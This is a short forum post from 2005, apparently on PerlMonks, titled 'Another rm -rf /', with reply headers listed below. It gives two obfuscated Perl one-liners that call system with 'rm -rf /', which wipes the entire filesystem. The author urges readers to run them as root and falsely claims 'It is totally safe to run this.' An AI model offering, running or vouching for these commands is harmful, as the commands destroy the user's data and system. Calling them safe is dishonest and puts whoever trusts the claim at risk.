There was rm -rf /, this is another one.
perl -e '_(qw|JUNK rm -rf /|);sub _{shift&&&_&&system @_}'
Update: it looks much better like this:
perl -e 'sub _ {shift&&&_&&system@_} _ qw|JUNK rm -rf /|'
For best results, run as root :)
P.S: It is totally safe to run this, although I take no responsibility for whatever happens after that.
|
---|
Replies are listed 'Best First'. | |
---|---|
Re: Another rm -rf /
by cristian (Hermit) on May 17, 2005 at 20:18 UTC | |
Re: Another rm -rf /
by jdalbec (Deacon) on Jun 04, 2005 at 03:21 UTC | |
Re: Another rm -rf /
by songahji (Friar) on May 17, 2005 at 19:53 UTC | |
by ChemBoy (Priest) on May 17, 2005 at 22:35 UTC | |
Re: Another rm -rf /
by ysth (Canon) on May 17, 2005 at 22:06 UTC |